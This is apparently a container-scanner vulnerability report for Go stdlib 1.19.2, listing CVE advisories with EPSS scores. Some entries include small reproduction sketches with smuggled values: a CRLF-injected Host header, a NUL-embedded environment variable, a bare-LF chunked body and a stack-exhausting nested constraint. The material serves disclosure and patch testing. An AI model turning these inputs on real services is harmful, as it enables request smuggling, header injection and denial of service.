stdlib 1.19.2 (golang)
pkg:golang/stdlib@1.19.2

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.21.11 | 1.21.11 | 0.082% | 24th percentile |
Description
The various Is methods (IsPrivate, IsLoopback, etc.) did not work as expected for IPv4-mapped IPv6 addresses, returning false for addresses which would return true in their traditional IPv4 forms.
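A minimal sketch of the mismatch, using net/netip where these methods are defined; the commented results reflect the behavior described above and are assumptions about the specific versions in play:

```go
package main

import (
	"fmt"
	"net/netip"
)

func main() {
	// The same private host written as plain IPv4 and as an
	// IPv4-mapped IPv6 address.
	v4 := netip.MustParseAddr("192.168.1.1")
	mapped := netip.MustParseAddr("::ffff:192.168.1.1")

	fmt.Println(v4.IsPrivate())     // true on all versions
	fmt.Println(mapped.IsPrivate()) // false before the fix, true after
}
```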

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.19.9 | 1.19.9 | 0.250% | 48th percentile |
Description
Not all valid JavaScript whitespace characters are considered to be whitespace. Templates containing whitespace characters outside of the character set "\t\n\f\r\u0020\u2028\u2029" in JavaScript contexts that also contain actions may not be properly sanitized during execution.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.19.8 | 1.19.8 | 0.664% | 70th percentile |
Description
Templates do not properly consider backticks (`) as Javascript string delimiters, and do not escape them as expected.
Backticks are used, since ES6, for JS template literals. If a template contains a Go template action within a Javascript template literal, the contents of the action can be used to terminate the literal, injecting arbitrary Javascript code into the Go template.
As ES6 template literals are rather complex, and themselves can do string interpolation, the decision was made to simply disallow Go template actions from being used inside of them (e.g. "var a = `{{.}}`"), since there is no obviously safe way to allow this behavior. This takes the same approach as github.com/google/safehtml.
With fix, Template.Parse returns an Error when it encounters templates like this, with an ErrorCode of value 12. This ErrorCode is currently unexported, but will be exported in the release of Go 1.21.
Users who rely on the previous behavior can re-enable it using the GODEBUG flag jstmpllitinterp=1, with the caveat that backticks will now be escaped. This should be used with caution.
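A sketch of the rejected construct; whether the error surfaces at Parse or at first Execute varies by version, so this probes both (output depends on the Go version and GODEBUG setting):

```go
package main

import (
	"fmt"
	"html/template"
	"io"
)

func main() {
	// A Go template action inside a JS template literal (backticks).
	tmpl, err := template.New("t").Parse("<script>var a = `{{.}}`;</script>")
	if err == nil {
		err = tmpl.Execute(io.Discard, "hello")
	}
	// Fixed versions report the "JS template literal" error described
	// above; with GODEBUG=jstmpllitinterp=1 the action is allowed but
	// backticks are escaped.
	fmt.Println(err)
}
```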

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.23.8 | 1.23.8 | 0.019% | 4th percentile |
Description
The net/http package improperly accepts a bare LF as a line terminator in chunked data chunk-size lines. This can permit request smuggling if a net/http server is used in conjunction with a server that incorrectly accepts a bare LF as part of a chunk-ext.
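A hedged reproduction sketch using httputil.NewChunkedReader, which wraps the same chunked decoder net/http uses; the commented outcomes are assumptions based on the advisory text:

```go
package main

import (
	"fmt"
	"io"
	"net/http/httputil"
	"strings"
)

func main() {
	// Chunk-size line "3" terminated by a bare LF instead of CRLF.
	body := "3\nabc\r\n0\r\n\r\n"
	r := httputil.NewChunkedReader(strings.NewReader(body))
	data, err := io.ReadAll(r)
	// Vulnerable versions yield "abc" with no error; fixed versions
	// report a malformed chunked encoding.
	fmt.Printf("%q %v\n", data, err)
}
```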

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.19.10 | 1.19.10 | 0.009% | 1st percentile |
Description
On Unix platforms, the Go runtime does not behave differently when a binary is run with the setuid/setgid bits. This can be dangerous in certain cases, such as when dumping memory state, or assuming the status of standard i/o file descriptors.
If a setuid/setgid binary is executed with standard I/O file descriptors closed, opening any files can result in unexpected content being read or written with elevated privileges. Similarly, if a setuid/setgid program is terminated, either via panic or signal, it may leak the contents of its registers.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.24.11 | 1.24.11 | 0.016% | 3rd percentile |
Description
Within HostnameError.Error(), when constructing an error string, there is no limit to the number of hosts that will be printed out. Furthermore, the error string is constructed by repeated string concatenation, leading to quadratic runtime. Therefore, a certificate provided by a malicious actor can result in excessive resource consumption.
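The underlying failure mode is generic: building a long string with repeated `+=` is quadratic, while strings.Builder is linear. An illustrative comparison (not the actual crypto/x509 code):

```go
package main

import (
	"fmt"
	"strings"
	"time"
)

func main() {
	const n = 20000
	start := time.Now()
	s := ""
	for i := 0; i < n; i++ {
		s += "host.example, " // copies everything built so far: O(n^2) overall
	}
	fmt.Println(len(s), "naive concat:", time.Since(start))

	start = time.Now()
	var b strings.Builder
	for i := 0; i < n; i++ {
		b.WriteString("host.example, ") // amortized O(1) append: O(n) overall
	}
	fmt.Println(b.Len(), "strings.Builder:", time.Since(start))
}
```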

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.24.8 | 1.24.8 | 0.026% | 6th percentile |
Description
The ParseAddress function constructs domain-literal address components through repeated string concatenation. When parsing large domain-literal components, this can cause excessive CPU consumption.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.24.8 | 1.24.8 | 0.026% | 6th percentile |
Description
The processing time for parsing some invalid inputs scales non-linearly with respect to the size of the input.
This affects programs which parse untrusted PEM inputs.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.24.8 | 1.24.8 | 0.014% | 2nd percentile |
Description
Validating certificate chains which contain DSA public keys can cause programs to panic, due to an interface cast that assumes they implement the Equal method.
This affects programs which validate arbitrary certificate chains.
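An illustrative sketch of the crash pattern, with a hypothetical `equaler` interface standing in for the actual crypto/x509 internals:

```go
package main

import "fmt"

// Hypothetical stand-ins for illustration; not the crypto/x509 source.
type equaler interface {
	Equal(x any) bool
}

type dsaLikeKey struct{} // has no Equal method

func samePublicKey(a, b any) bool {
	return a.(equaler).Equal(b) // one-return assertion: panics if a lacks Equal
}

func samePublicKeySafe(a, b any) bool {
	e, ok := a.(equaler) // comma-ok form degrades gracefully
	return ok && e.Equal(b)
}

func main() {
	fmt.Println(samePublicKeySafe(dsaLikeKey{}, dsaLikeKey{})) // false
	fmt.Println(samePublicKey(dsaLikeKey{}, dsaLikeKey{}))     // panics
}
```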

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.24.9 | 1.24.9 | 0.015% | 3rd percentile |
Description
Due to the design of the name constraint checking algorithm, the processing time of some inputs scales non-linearly with respect to the size of the certificate.
This affects programs which validate arbitrary certificate chains.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.22.7 | 1.22.7 | 0.147% | 36th percentile |
Description
Calling Parse on a "// +build" build tag line with deeply nested expressions can cause a panic due to stack exhaustion.
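A hedged proof-of-concept sketch using go/build/constraint, which parses both "// +build" and "//go:build" lines; the nesting depth is an illustrative assumption:

```go
package main

import (
	"fmt"
	"go/build/constraint"
	"strings"
)

func main() {
	// A deeply nested constraint expression; the depth is illustrative.
	// On vulnerable versions the recursive parser can exhaust the stack
	// and panic, so run this in a throwaway process.
	depth := 1_000_000
	line := "//go:build " + strings.Repeat("(", depth) + "linux" + strings.Repeat(")", depth)
	expr, err := constraint.Parse(line)
	fmt.Println(expr, err)
}
```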

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.22.7 | 1.22.7 | 0.298% | 53rd percentile |
Description
Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.21.12 | 1.21.12 | 0.618% | 69th percentile |
Description
The net/http HTTP/1.1 client mishandled the case where a server responds to a request with an "Expect: 100-continue" header with a non-informational (200 or higher) status. This mishandling could leave a client connection in an invalid state, where the next request sent on the connection will fail.
An attacker sending a request to a net/http/httputil.ReverseProxy proxy can exploit this mishandling to cause a denial of service by sending "Expect: 100-continue" requests which elicit a non-informational response from the backend. Each such request leaves the proxy with an invalid connection, and causes one subsequent request using that connection to fail.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.21.8 | 1.21.8 | 1.498% | 81st percentile |
Description
The ParseAddressList function incorrectly handles comments (text within parentheses) within display names. Since this is a misalignment with conforming address parsers, it can result in different trust decisions being made by programs using different parsers.
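A small probe of the ambiguous input; how Name and Address come back (or whether parsing is rejected) differs by Go version, which is exactly the cross-parser disagreement at issue:

```go
package main

import (
	"fmt"
	"net/mail"
)

func main() {
	// A comment (parenthesized text) inside a display name.
	list, err := mail.ParseAddressList("Gopher (Comment) <gopher@example.com>")
	if err != nil {
		fmt.Println("rejected:", err)
		return
	}
	for _, a := range list {
		fmt.Printf("name=%q addr=%q\n", a.Name, a.Address)
	}
}
```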

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.21.9 | 1.21.9 | 66.635% | 98th percentile |
Description
An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames.
Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request's headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed.
This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send.
The fix sets a limit on the amount of excess header frames we will process before closing a connection.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.20.0 | 1.20.0 | 0.185% | 40th percentile |
Description
Before Go 1.20, the RSA based TLS key exchanges used the math/big library, which is not constant time. RSA blinding was applied to prevent timing attacks, but analysis shows this may not have been fully effective. In particular it appears as if the removal of PKCS#1 padding may leak timing information, which in turn could be used to recover session key bits.
In Go 1.20, the crypto/tls library switched to a fully constant time RSA implementation, which we do not believe exhibits any timing side channels.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.20.11 | 1.20.11 | 0.097% | 27th percentile |
Description
The filepath package does not recognize paths with a `\??\` prefix as special.
On Windows, a path beginning with `\??\` is a Root Local Device path equivalent to a path beginning with `\\?\`. Paths with a `\??\` prefix may be used to access arbitrary locations on the system. For example, the path `\??\c:\x` is equivalent to the more common path `c:\x`.
Before fix, Clean could convert a rooted path such as `\a\..\??\b` into the root local device path `\??\b`. Clean will now convert this to `.\??\b`.
Similarly, Join(`\`, `??`, `b`) could convert a seemingly innocent sequence of path elements into the root local device path `\??\b`. Join will now convert this to `\.\??\b`.
In addition, with fix, IsAbs now correctly reports paths beginning with `\??\` as absolute, and VolumeName correctly reports the `\??\` prefix as a volume name.
UPDATE: Go 1.20.11 and Go 1.21.4 inadvertently changed the definition of the volume name in Windows paths starting with `\?`, resulting in filepath.Clean(`\?\c:`) returning `\?\c:` rather than `\?\c:\` (among other effects). The previous behavior has been restored.
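A sketch probing the fixed behavior; it is meaningful on Windows only (elsewhere these are ordinary paths), and the commented results are assumptions drawn from the advisory text above:

```go
package main

import (
	"fmt"
	"path/filepath"
)

func main() {
	// Meaningful on Windows only; elsewhere these are ordinary paths.
	fmt.Println(filepath.Clean(`\a\..\??\b`))    // fixed: .\??\b, not \??\b
	fmt.Println(filepath.IsAbs(`\??\c:\x`))      // fixed: true
	fmt.Println(filepath.VolumeName(`\??\c:\x`)) // fixed: \??\ prefix reported
}
```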

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.20.10 | 1.20.10 | 94.419% | 100th percentile |
Description
A malicious HTTP/2 client which rapidly creates requests and immediately resets them can cause excessive server resource consumption. While the total number of requests is bounded by the http2.Server.MaxConcurrentStreams setting, resetting an in-progress request allows the attacker to create a new request while the existing one is still executing.
With the fix applied, HTTP/2 servers now bound the number of simultaneously executing handler goroutines to the stream concurrency limit (MaxConcurrentStreams). New requests arriving when at the limit (which can only happen after the client has reset an existing, in-flight request) will be queued until a handler exits. If the request queue grows too large, the server will terminate the connection.
This issue is also fixed in golang.org/x/net/http2 for users manually configuring HTTP/2.
The default stream concurrency limit is 250 streams (requests) per HTTP/2 connection. This value may be adjusted using the golang.org/x/net/http2 package; see the Server.MaxConcurrentStreams setting and the ConfigureServer function.
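A configuration sketch using the Server.MaxConcurrentStreams setting and ConfigureServer function mentioned above; the port, limit, and certificate paths are illustrative placeholders:

```go
package main

import (
	"net/http"

	"golang.org/x/net/http2"
)

func main() {
	srv := &http.Server{Addr: ":8443", Handler: http.NewServeMux()}
	// Tighten the per-connection stream limit below the default of 250.
	if err := http2.ConfigureServer(srv, &http2.Server{MaxConcurrentStreams: 100}); err != nil {
		panic(err)
	}
	// srv.ListenAndServeTLS("cert.pem", "key.pem") would then serve
	// HTTP/2 with the configured limit; the cert paths are placeholders.
	_ = srv
}
```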

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.20.10 | 1.20.10 | 0.163% | 38th percentile |
Description
A malicious HTTP/2 client which rapidly creates requests and immediately resets them can cause excessive server resource consumption. While the total number of requests is bounded by the http2.Server.MaxConcurrentStreams setting, resetting an in-progress request allows the attacker to create a new request while the existing one is still executing.
With the fix applied, HTTP/2 servers now bound the number of simultaneously executing handler goroutines to the stream concurrency limit (MaxConcurrentStreams). New requests arriving when at the limit (which can only happen after the client has reset an existing, in-flight request) will be queued until a handler exits. If the request queue grows too large, the server will terminate the connection.
This issue is also fixed in golang.org/x/net/http2 for users manually configuring HTTP/2.
The default stream concurrency limit is 250 streams (requests) per HTTP/2 connection. This value may be adjusted using the golang.org/x/net/http2 package; see the Server.MaxConcurrentStreams setting and the ConfigureServer function.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.19.8 | 1.19.8 | 0.013% | 2nd percentile |
Description
Calling any of the Parse functions on Go source code which contains //line directives with very large line numbers can cause an infinite loop due to integer overflow.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.19.8 | 1.19.8 | 0.059% | 19th percentile |
Description
Multipart form parsing can consume large amounts of CPU and memory when processing form inputs containing very large numbers of parts.
This stems from several causes:
- mime/multipart.Reader.ReadForm limits the total memory a parsed multipart form can consume. ReadForm can undercount the amount of memory consumed, leading it to accept larger inputs than intended.
- Limiting total memory does not account for increased pressure on the garbage collector from large numbers of small allocations in forms with many parts.
- ReadForm can allocate a large number of short-lived buffers, further increasing pressure on the garbage collector.
The combination of these factors can permit an attacker to cause a program that parses multipart forms to consume large amounts of CPU and memory, potentially resulting in a denial of service. This affects programs that use mime/multipart.Reader.ReadForm, as well as form parsing in the net/http package with the Request methods FormFile, FormValue, ParseMultipartForm, and PostFormValue.
With fix, ReadForm now does a better job of estimating the memory consumption of parsed forms, and performs many fewer short-lived allocations.
In addition, the fixed mime/multipart.Reader imposes the following limits on the size of parsed forms:
- Forms parsed with ReadForm may contain no more than 1000 parts. This limit may be adjusted with the environment variable GODEBUG=multipartmaxparts=.
- Form parts parsed with NextPart and NextRawPart may contain no more than 10,000 header fields. In addition, forms parsed with ReadForm may contain no more than 10,000 header fields across all parts. This limit may be adjusted with the environment variable GODEBUG=multipartmaxheaders=.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.19.8 | 1.19.8 | 0.040% | 12th percentile |
Description
HTTP and MIME header parsing can allocate large amounts of memory, even when parsing small inputs, potentially leading to a denial of service.
Certain unusual patterns of input data can cause the common function used to parse HTTP and MIME headers to allocate substantially more memory than required to hold the parsed headers. An attacker can exploit this behavior to cause an HTTP server to allocate large amounts of memory from a small request, potentially leading to memory exhaustion and a denial of service.
With fix, header parsing now correctly allocates only the memory required to hold parsed headers.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.19.6 | 1.19.6 | 0.046% | 14th percentile |
Description
A denial of service is possible from excessive resource consumption in net/http and mime/multipart.
Multipart form parsing with mime/multipart.Reader.ReadForm can consume largely unlimited amounts of memory and disk files. This also affects form parsing in the net/http package with the Request methods FormFile, FormValue, ParseMultipartForm, and PostFormValue.
ReadForm takes a maxMemory parameter, and is documented as storing "up to maxMemory bytes +10MB (reserved for non-file parts) in memory". File parts which cannot be stored in memory are stored on disk in temporary files. The unconfigurable 10MB reserved for non-file parts is excessively large and can potentially open a denial of service vector on its own. However, ReadForm did not properly account for all memory consumed by a parsed form, such as map entry overhead, part names, and MIME headers, permitting a maliciously crafted form to consume well over 10MB. In addition, ReadForm contained no limit on the number of disk files created, permitting a relatively small request body to create a large number of disk temporary files.
With fix, ReadForm now properly accounts for various forms of memory overhead, and should now stay within its documented limit of 10MB + maxMemory bytes of memory consumption. Users should still be aware that this limit is high and may still be hazardous.
In addition, ReadForm now creates at most one on-disk temporary file, combining multiple form parts into a single temporary file. The mime/multipart.File interface type's documentation states, "If stored on disk, the File's underlying concrete type will be an *os.File.". This is no longer the case when a form contains more than one file part, due to this coalescing of parts into a single file. The previous behavior of using distinct files for each form part may be reenabled with the environment variable GODEBUG=multipartfiles=distinct.
Users should be aware that multipart.ReadForm and the http.Request methods that call it do not limit the amount of disk consumed by temporary files. Callers can limit the size of form data with http.MaxBytesReader.
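A sketch of the http.MaxBytesReader mitigation named above; the 10 MiB cap, maxMemory value, and handler shape are illustrative choices, not prescribed values:

```go
package main

import "net/http"

func uploadHandler(w http.ResponseWriter, r *http.Request) {
	// Cap the whole request body (10 MiB here, an arbitrary choice)
	// before multipart parsing ever reads it.
	r.Body = http.MaxBytesReader(w, r.Body, 10<<20)
	// maxMemory of 1 MiB; larger file parts spill to temporary files.
	if err := r.ParseMultipartForm(1 << 20); err != nil {
		http.Error(w, "request body too large", http.StatusRequestEntityTooLarge)
		return
	}
	w.Write([]byte("ok"))
}

func main() {
	http.HandleFunc("/upload", uploadHandler)
	http.ListenAndServe(":8080", nil)
}
```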

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.19.6 | 1.19.6 | 0.016% | 3rd percentile |
Description
Large handshake records may cause panics in crypto/tls.
Both clients and servers may send large TLS handshake records which cause servers and clients, respectively, to panic when attempting to construct responses.
This affects all TLS 1.3 clients, TLS 1.2 clients which explicitly enable session resumption (by setting Config.ClientSessionCache to a non-nil value), and TLS 1.3 servers which request client certificates (by setting Config.ClientAuth >= RequestClientCert).

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.19.6 | 1.19.6 | 0.235% | 46th percentile |
Description
A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.19.6 | 1.19.6 | 0.169% | 38th percentile |
Description
A path traversal vulnerability exists in filepath.Clean on Windows.
On Windows, the filepath.Clean function could transform an invalid path such as "a/../c:/b" into the valid path "c:\b". This transformation of a relative (if invalid) path into an absolute path could enable a directory traversal attack.
After fix, the filepath.Clean function transforms this path into the relative (but still invalid) path ".\c:\b".

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| >=1.19.0-0 <1.19.4 | 1.19.4 | 0.057% | 18th percentile |
Description
On Windows, restricted files can be accessed via os.DirFS and http.Dir.
The os.DirFS function and http.Dir type provide access to a tree of files rooted at a given directory. These functions permit access to Windows device files under that root. For example, os.DirFS("C:/tmp").Open("COM1") opens the COM1 device. Both os.DirFS and http.Dir only provide read-only filesystem access.
In addition, on Windows, an os.DirFS for the directory `\` (the root of the current drive) can permit a maliciously crafted path to escape from the drive and access any path on the system.
With fix applied, the behavior of os.DirFS("") has changed. Previously, an empty root was treated equivalently to "/", so os.DirFS("").Open("tmp") would open the path "/tmp". This now returns an error.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| >=1.19.0-0 <1.19.3 | 1.19.3 | 0.022% | 5th percentile |
Description
Due to unsanitized NUL values, attackers may be able to maliciously set environment variables on Windows.
In syscall.StartProcess and os/exec.Cmd, invalid environment variable values containing NUL values are not properly checked for. A malicious environment variable value can exploit this behavior to set a value for a different environment variable. For example, the environment variable string "A=B\x00C=D" sets the variables "A=B" and "C=D".
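A hedged Windows reproduction sketch of the "A=B\x00C=D" case above; the exact error text on fixed versions is an assumption:

```go
package main

import (
	"fmt"
	"os/exec"
)

func main() {
	cmd := exec.Command("cmd", "/c", "set")
	// A NUL inside one value smuggles in a second variable ("C=D") on
	// vulnerable versions; fixed versions refuse to start the process.
	cmd.Env = []string{"A=B\x00C=D"}
	out, err := cmd.CombinedOutput()
	fmt.Println(string(out), err)
}
```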

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.22.7 | 1.22.7 | 0.160% | 37th percentile |
Description
Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.19.9 | 1.19.9 | 0.049% | 15th percentile |
Description
Templates containing actions in unquoted HTML attributes (e.g. "attr={{.}}") executed with empty input can result in output with unexpected results when parsed due to HTML normalization rules. This may allow injection of arbitrary attributes into tags.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.19.9 | 1.19.9 | 0.067% | 21st percentile |
Description
Angle brackets (<>) are not considered dangerous characters when inserted into CSS contexts. Templates containing multiple actions separated by a '/' character can result in unexpectedly closing the CSS context and allowing for injection of unexpected HTML, if executed with untrusted input.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.23.10 | 1.23.10 | 0.010% | 1st percentile |
Description
Proxy-Authorization and Proxy-Authenticate headers persisted on cross-origin redirects, potentially leaking sensitive information.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.24.11 | 1.24.11 | 0.021% | 5th percentile |
Description
An excluded subdomain constraint in a certificate chain does not restrict the usage of wildcard SANs in the leaf certificate. For example, a constraint that excludes the subdomain test.example.com does not prevent a leaf certificate from claiming the SAN *.example.com.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.23.12 | 1.23.12 | 0.020% | 5th percentile |
Description
If the PATH environment variable contains paths which are executables (rather than just directories), passing certain strings ("", ".", and "..") to LookPath can result in the binaries listed in the PATH being unexpectedly returned.
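A small probe of the affected inputs; results depend on the PATH contents and Go version:

```go
package main

import (
	"fmt"
	"os/exec"
)

func main() {
	// With an executable file (not a directory) listed on PATH,
	// vulnerable versions could resolve these names to that binary.
	for _, name := range []string{"", ".", ".."} {
		p, err := exec.LookPath(name)
		fmt.Printf("LookPath(%q) = %q, %v\n", name, p, err)
	}
}
```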

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.21.8 | 1.21.8 | 0.362% | 58th percentile |
Description
When parsing a multipart form (either explicitly with Request.ParseMultipartForm or implicitly with Request.FormValue, Request.PostFormValue, or Request.FormFile), limits on the total size of the parsed form were not applied to the memory consumed while reading a single form line. This permits a maliciously crafted input containing very long lines to cause allocation of arbitrarily large amounts of memory, potentially leading to memory exhaustion.
With fix, the ParseMultipartForm function now correctly limits the maximum size of form lines.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.19.11 | 1.19.11 | 0.236% | 46th percentile |
Description
The HTTP/1 client does not fully validate the contents of the Host header. A maliciously crafted Host header can inject additional headers or entire requests.
With fix, the HTTP/1 client now refuses to send requests containing an invalid Request.Host or Request.URL.Host value.
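A sketch of the client-side check; on fixed versions the error is returned before anything is sent, while the exact behavior on vulnerable versions is an assumption from the advisory:

```go
package main

import (
	"fmt"
	"net/http"
)

func main() {
	req, err := http.NewRequest("GET", "http://example.com/", nil)
	if err != nil {
		panic(err)
	}
	// A Host value carrying a CRLF; vulnerable clients copied it into
	// the wire request, allowing header or request injection.
	req.Host = "example.com\r\nX-Injected: oops"
	_, err = http.DefaultClient.Do(req)
	fmt.Println(err) // fixed versions refuse to send the request
}
```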

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.22.11 | 1.22.11 | 0.048% | 15th percentile |
Description
A certificate with a URI which has an IPv6 address with a zone ID may incorrectly satisfy a URI name constraint that applies to the certificate chain.
Certificates containing URIs are not permitted in the web PKI, so this only affects users of private PKIs which make use of URIs.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.22.11 | 1.22.11 | 0.078% | 24th percentile |
Description
The HTTP client drops sensitive headers after following a cross-domain redirect. For example, a request to a.com/ containing an Authorization header which is redirected to b.com/ will not send that header to b.com.
In the event that the client received a subsequent same-domain redirect, however, the sensitive headers would be restored. For example, a chain of redirects from a.com/, to b.com/1, and finally to b.com/2 would incorrectly send the Authorization header to b.com/2.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.20.8 | 1.20.8 | 0.085% | 25th percentile |
Description
The html/template package does not apply the proper rules for handling occurrences of `<script`, `<!--`, and `</script` within JS literals in `<script>` contexts. This may cause the template parser to improperly consider script contexts to be terminated early, causing actions to be improperly escaped. This could be leveraged to perform an XSS attack.
<a href="https://scout.docker.com/v/CVE-2023-39318?s=golang&n=stdlib&t=golang&vr=%3C1.20.8"><img alt="medium : CVE--2023--39318" src="https://img.shields.io/badge/CVE--2023--39318-lightgrey?label=medium%20&labelColor=fbb552"/></a>
| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.20.8 | 1.20.8 | 0.085% | 25th percentile |
Description
The html/template package does not properly handle HTML-like `<!--` and `-->` comment tokens, nor hashbang `#!` comment tokens, in `<script>` contexts. This may cause the template parser to improperly interpret the contents of `<script>` contexts, causing actions to be improperly escaped. This could be leveraged to perform an XSS attack.
<a href="https://scout.docker.com/v/CVE-2024-24783?s=golang&n=stdlib&t=golang&vr=%3C1.21.8"><img alt="medium : CVE--2024--24783" src="https://img.shields.io/badge/CVE--2024--24783-lightgrey?label=medium%20&labelColor=fbb552"/></a>
| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.21.8 | 1.21.8 | 0.445% | 63rd percentile |
Description
Verifying a certificate chain which contains a certificate with an unknown public key algorithm will cause Certificate.Verify to panic.
This affects all crypto/tls clients, and servers that set Config.ClientAuth to VerifyClientCertIfGiven or RequireAndVerifyClientCert. The default behavior is for TLS servers to not verify client certificates.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.23.10 | 1.23.10 | 0.008% | 1st percentile |
Description
os.OpenFile(path, os.O_CREATE|os.O_EXCL) behaved differently on Unix and Windows systems when the target path was a dangling symlink. On Unix systems, OpenFile with O_CREATE and O_EXCL flags never follows symlinks. On Windows, when the target path was a symlink to a nonexistent location, OpenFile would create a file in that location. OpenFile now always returns an error when the O_CREATE and O_EXCL flags are both set and the target path is a symlink.
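A reproduction sketch of the divergent behavior (the interesting case is Windows, where symlink creation may require privileges):

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
)

func main() {
	dir, err := os.MkdirTemp("", "excl")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)

	// A dangling symlink: its target does not exist.
	link := filepath.Join(dir, "link")
	if err := os.Symlink(filepath.Join(dir, "missing"), link); err != nil {
		fmt.Println("symlink:", err) // may need extra privileges on Windows
		return
	}

	// Fixed versions return an error on every platform; vulnerable
	// Windows versions created a file at the symlink's target instead.
	_, err = os.OpenFile(link, os.O_CREATE|os.O_EXCL|os.O_WRONLY, 0o600)
	fmt.Println("OpenFile:", err)
}
```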

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.21.11 | 1.21.11 | 0.006% | 0th percentile |
Description
The archive/zip package's handling of certain types of invalid zip files differs from the behavior of most zip implementations. This misalignment could be exploited to create a zip file with contents that vary depending on the implementation reading the file. The archive/zip package now rejects files containing these errors.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.21.8 | 1.21.8 | 0.273% | 50th percentile |
Description
If errors returned from MarshalJSON methods contain user controlled data, they may be used to break the contextual auto-escaping behavior of the html/template package, allowing for subsequent actions to inject unexpected content into templates.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.24.8 | 1.24.8 | 0.025% | 6th percentile |
Description
The Reader.ReadResponse function constructs a response string through repeated string concatenation of lines. When the number of lines in a response is large, this can cause excessive CPU consumption.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.24.8 | 1.24.8 | 0.019% | 4th percentile |
Description
When Conn.Handshake fails during ALPN negotiation, the error contains attacker-controlled information (the ALPN protocols sent by the client) which is not escaped.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.24.8 | 1.24.8 | 0.029% | 7th percentile |
Description
Despite HTTP headers having a default limit of 1MB, the number of cookies that can be parsed does not have a limit. By sending a large number of very small cookies such as "a=;", an attacker can make an HTTP server allocate a large number of structs, causing large memory consumption.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.24.8 | 1.24.8 | 0.033% | 9th percentile |
Description
Parsing a maliciously crafted DER payload could allocate large amounts of memory, causing memory exhaustion.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.24.8 | 1.24.8 | 0.025% | 6th percentile |
Description
The Parse function permits values other than IPv6 addresses to be included in square brackets within the host component of a URL. RFC 3986 permits IPv6 addresses to be included within the host component, enclosed within square brackets. For example: "http://[::1]/". IPv4 addresses and hostnames must not appear within square brackets. Parse did not enforce this requirement.
